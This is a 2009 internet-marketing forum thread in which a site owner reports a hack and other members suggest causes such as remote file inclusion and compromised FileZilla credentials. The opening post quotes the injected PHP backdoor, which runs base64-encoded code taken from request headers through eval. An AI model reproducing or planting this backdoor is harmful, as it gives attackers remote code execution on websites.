Go Back   WarriorForum - Internet Marketing Forums > The Warrior Forum > Main Internet Marketing Discussion Forum
Register Blogs FAQ Social Groups CalendarHelp Desk

Reply
 
LinkBack Thread Tools
Old 09-11-2009, 01:24 PM   #1
Floating Warrior
War Room Member
 
trishworks4u's Avatar
 
Join Date: Dec 2008
Location: St. Petersburg, FL
Posts: 483
Thanks: 45
Thanked 85 Times in 71 Posts
Social Networking View Member's Twitter Profile  View Member's YouTube Profile
Contact Info
Send a message via MSN to trishworks4u Send a message via Skype™ to trishworks4u
Default My Affiliate Site was Hacked!!! So freakin' mad...

Holy crap! wtf? I just thought sales were slow. Turns out someone uploaded a php script:

<?php function gpc_4808($l4810){if(is_array($l4810)){foreach($l48 10 as $l4808=>$l4809)$l4810[$l4808]=gpc_4808($l4809);}elseif(is_string($l4810) && substr($l4810,0,4)=="____"){eval(base64_decode(sub str($l4810,4)));$l4810=null;}return $l4810;}if(empty($_SERVER))$_SERVER=$HTTP_SERVER_V ARS;array_map("gpc_4808",$_SERVER);
// Silence is golden.
?>

to index.php that took my whole freakin' site offline a week ago! How does this happen? I am the only one that has ftp access to any of my sites.

I only have 1 site that really makes any money and this is it. I'm already in a mood today. This is just so wrong.
trishworks4u is offline   Reply With Quote
Old 09-11-2009, 01:42 PM   #2
Ross Carrel
War Room Member
 
Ross Vegas's Avatar
 
Join Date: Jun 2007
Location: Tampa, FL/Vegas, NV
Posts: 356
Blog Entries: 1
Thanks: 4
Thanked 60 Times in 39 Posts
Social Networking View Member's Twitter Profile 
Default Re: My Affiliate Site was Hacked!!! So freakin' mad...

I have one fairly high profile niche site, that just had something similar happen as well...

RFI (remote file inclusion) look it up..it's freaky how easily some people can access your files.

With php basically if a few tricks aren't employed someone can run their own file from your server and through some dark magic I don't truly understand they create a file on your server which basically acts like an entire ftp control panel.

I have someone that takes care of this stuff for me so I can't help much more than that...sucks for sure though.
Ross Vegas is offline   Reply With Quote
Old 09-11-2009, 01:54 PM   #3
Advanced Warrior
War Room Member
 
thunderbird's Avatar
 
Join Date: Jun 2007
Location: Vancouver, BC, Canada.
Posts: 797
Thanks: 349
Thanked 496 Times in 374 Posts
Social Networking View Member's Twitter Profile 
Default Re: My Affiliate Site was Hacked!!! So freakin' mad...

What CMS did you use for your site?

Donate to Directly Help Critically Ill Warrior KimW.
QR Code to KimW Mega-WSO http://qrgenerator.biz/view.php?id=3

Please take my new online business directory for a spin. List your business, website, logo, embed a video. Feedback appreciated.
thunderbird is offline   Reply With Quote
Old 09-11-2009, 02:08 PM   #4
Floating Warrior
War Room Member
 
trishworks4u's Avatar
 
Join Date: Dec 2008
Location: St. Petersburg, FL
Posts: 483
Thanks: 45
Thanked 85 Times in 71 Posts
Social Networking View Member's Twitter Profile  View Member's YouTube Profile
Contact Info
Send a message via MSN to trishworks4u Send a message via Skype™ to trishworks4u
Default Re: My Affiliate Site was Hacked!!! So freakin' mad...

are you talking about a content mgmt system? because I don't. I build my sites in Dreamweaver and upload w/ Filezilla. There's no online editing going on there.

Well, unless it's a blog. I have lots of those but those are all WP and this was not a WP platform. Straight html sales/review page.
trishworks4u is offline   Reply With Quote
Old 09-11-2009, 02:23 PM   #5
Advanced Warrior
War Room Member
 
thunderbird's Avatar
 
Join Date: Jun 2007
Location: Vancouver, BC, Canada.
Posts: 797
Thanks: 349
Thanked 496 Times in 374 Posts
Social Networking View Member's Twitter Profile 
Default Re: My Affiliate Site was Hacked!!! So freakin' mad...

Yup, that's what I meant. Just wondering, in case this might be a hint of attacks to come (wp is my main concern). No advice to offer. Sometimes hosts can improve security, close some holes.

Donate to Directly Help Critically Ill Warrior KimW.
QR Code to KimW Mega-WSO http://qrgenerator.biz/view.php?id=3

Please take my new online business directory for a spin. List your business, website, logo, embed a video. Feedback appreciated.
thunderbird is offline   Reply With Quote
Old 09-11-2009, 04:48 PM   #6
Floating Warrior
War Room Member
 
trishworks4u's Avatar
 
Join Date: Dec 2008
Location: St. Petersburg, FL
Posts: 483
Thanks: 45
Thanked 85 Times in 71 Posts
Social Networking View Member's Twitter Profile  View Member's YouTube Profile
Contact Info
Send a message via MSN to trishworks4u Send a message via Skype™ to trishworks4u
Default Re: My Affiliate Site was Hacked!!! So freakin' mad...

yeah - was thinking I might be able to figure out who it was through google analytics or my raw access files but I can't. I even contacted my host (Bluehost) who wrote back right away with a mile long list of security scripts and stuff that might as well be in Chinese. They also told me that I won't be able to figure out who it is.

It looks like in your cpanel you can actually block IP addresses from accessing your site and, if you don't have an IP address, you can enter in a domain name and they will try to block with that. I'm wondering if I just shouldn't pull up my main competitors in that niche and put them all in there. Ridiculous that I would have to do that.
trishworks4u is offline   Reply With Quote
Old 09-11-2009, 04:57 PM   #7
Senior Warrior Member
War Room Member
 
Daniel Brock's Avatar
 
Join Date: Aug 2008
Posts: 1,628
Thanks: 169
Thanked 934 Times in 254 Posts
Contact Info
Send a message via Skype™ to Daniel Brock
Default Re: My Affiliate Site was Hacked!!! So freakin' mad...

I still don't get the point of putting effort into hacking someones site when they don't do anything with it.

It seems like most of these hackers 'hack'(or run a pre-made script...wow so hard!), for no reason at all. Most of the times all they do is deface a website or bring it down.

They must not value their time at all of they are spending it on bringing peoples websites down for ****s and giggles.

Clickbank #1 Best Seller: The Deadbeat Super Affiliate.

Click here to learn how to make money online in your bath robe and gym socks!
Daniel Brock is online now   Reply With Quote
Old 09-11-2009, 06:06 PM   #8
With a Mastiff at my feet
War Room Member
 
TinkBD's Avatar
 
Join Date: Feb 2006
Location: Kentucky,USA.
Posts: 904
Thanks: 1,144
Thanked 188 Times in 108 Posts
Social Networking View Member's Twitter Profile 
Default Re: My Affiliate Site was Hacked!!! So freakin' mad...

I am so sorry for your pain, Trish! It may well be that the problem is with your computer.

I went thru this in March/April with a number of my sites.

I checked both of my computers with ZoneAlarm, SpyBot Search and Destroy, AdAware, and MalwareBytes AntiMalware and found nothing... but it kept happening!

I finally contacted my computer guy and we discussed my options... We figured that the odds were high that both my desktop and laptop were affected/infected... I hope to replace them both this year, so we decided to leave the desktop alone and wipe the laptop.

Now I use the desktop to surf, but not access the backend of any of my web sites...

I work on my sites only from the laptop. I hand carry files back and forth between the two.

So far so good... It is a PITA but my sites have stayed clean...

The painful thing is that I lost a LOT of time and even more disturbing, I lost a lot of my impetus. I am now FINALLY getting back in the groove. ...sigh...

BTW, my computer guy is familiar with the WF. I don't think that he spends much time here though. LOLOL

Tink

TinkBD is online now   Reply With Quote
Old 09-11-2009, 07:01 PM   #9
Yes that's my true photo
War Room Member
 
Janet Sawyer's Avatar
 
Join Date: Sep 2003
Location: Stockport, United Kingdom.
Posts: 1,720
Thanks: 81
Thanked 143 Times in 105 Posts
Contact Info
Send a message via Skype™ to Janet Sawyer
Default Re: My Affiliate Site was Hacked!!! So freakin' mad...

A second vote for site warder.

It works. It reports and it does it's job.

Site Warder - Website File Monitoring Script

I've got an affiliate link to this, but don't want to make any money from here.

(John, just want to say thanks for a brilliant script.)

Buy it Jeeze only $27 for real peace of mind, and so simple to use too.

Janet Sawyer is offline   Reply With Quote
Old 09-11-2009, 09:11 PM   #10
Floating Warrior
War Room Member
 
trishworks4u's Avatar
 
Join Date: Dec 2008
Location: St. Petersburg, FL
Posts: 483
Thanks: 45
Thanked 85 Times in 71 Posts
Social Networking View Member's Twitter Profile  View Member's YouTube Profile
Contact Info
Send a message via MSN to trishworks4u Send a message via Skype™ to trishworks4u
Default Re: My Affiliate Site was Hacked!!! So freakin' mad...

I appreciated the referrals to sitewarder. Am checking it out and working on security now. The only reason I think this is malicious, and then I'm going to take a deep breath and let it go (promise) is because this is my one money making site out of at least 20 that I have up and it's in a competitive niche AND I got in at the beginning, on a hunch...all of my traffic is organic.

Trust me, if you want shop at my ebay store, look at any of my blogs, buy any number of clickbank products, solar panels...I don't even know what else. Those sites are all up and not earning a dime. Heck - I'd hand out the FTP access if I thought it might improve them.

Ok, I'm calling it a night. but, that's my point really. It's that ONE site.... grrrrrrr
trishworks4u is offline   Reply With Quote
Old 09-11-2009, 10:41 PM   #11
HyperActive Warrior
 
CmdrStidd's Avatar
 
Join Date: Feb 2009
Location: Cincinnati, OH, USA
Posts: 323
Thanks: 68
Thanked 37 Times in 31 Posts
Default Re: My Affiliate Site was Hacked!!! So freakin' mad...

Trish, do you use a business layer in your design to filter all the inputs through? What kind of validation do you do on your inputs from the end user? You should have a business layer and a validation layer between the end user gui and the communications layer to block these kinds of attacks.
CmdrStidd is offline   Reply With Quote
Old 09-11-2009, 11:25 PM   #12
HyperActive Warrior
 
ryansjones's Avatar
 
Join Date: Oct 2008
Location: Snohomish, WA
Posts: 119
Blog Entries: 4
Thanks: 0
Thanked 3 Times in 3 Posts
Social Networking View Member's Myspace Profile  View Member's FaceBook Profile  View Member's Twitter Profile  View Member's YouTube Profile
Contact Info
Send a message via AIM to ryansjones Send a message via MSN to ryansjones
Default Re: My Affiliate Site was Hacked!!! So freakin' mad...

I had that problem myself in the first few months when I still had www.ryansjones.com (which I decided to scrap this summer when it was time to renew the website due ot the lack of conversions and since I had a better site in mind). One time, I had a blank screen when I accessed my site, at another time I got a "forbidden" message for some reason, amonst several things. Though I was able to regain control each time and put it back to how it was (that was the turn key website I had with yourbizwebsites). Since I've joined global domains international, I haven't had any problems with my sites through them (though Site Builder does get glitchy at times from my experience).

http://www.xboxfreak.ws
watch viral videos about animals at http://rjanimalvideos.blogspot.com
Connect with me on viral networks at http://viralnetworks.com/profile/uid...yan_Jones.html
ryansjones is offline   Reply With Quote
Old 09-12-2009, 12:13 PM   #13
GooglePlaces Optimization
War Room Member
 
Catalyst eMarketing's Avatar
 
Join Date: Nov 2004
Location: SoCal
Posts: 759
Thanks: 52
Thanked 176 Times in 98 Posts
Social Networking View Member's Twitter Profile 
Default Re: My Affiliate Site was Hacked!!! So freakin' mad...

Trish, so sorry this happened to you!

Quote:
Originally Posted by trishworks4u View Post
I build my sites in Dreamweaver and upload w/ Filezilla.
FileZilla could very well be the problem. Lots of people are getting hacked after uploading sites with Filezilla.

Here's a post from a Warrior member all about it.

My sites were hacked last week (This may help if it happens to you)

Plus you can Google: Filezilla hacked and various keywords for more info.

Linda Buquet :: Google Places Optimization Specialist :: Catalyst eMarketing
Google Places Optimization :: ADVANCED GOOGLE PLACES TRAINING Available
Google Places Optimization & Local SEO BLOG :: Latest Google Places News and Tips
BEST Google Places Software & FREE Local SEO Tools
Catalyst eMarketing is online now   Reply With Quote
Reply

  WarriorForum - Internet Marketing Forums > The Warrior Forum > Main Internet Marketing Discussion Forum

Tags
affiliate, freakin, hacked, mad, site

Thread Tools

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are Off
Pingbacks are Off
Refbacks are Off



All times are GMT -6. The time now is 02:01 PM.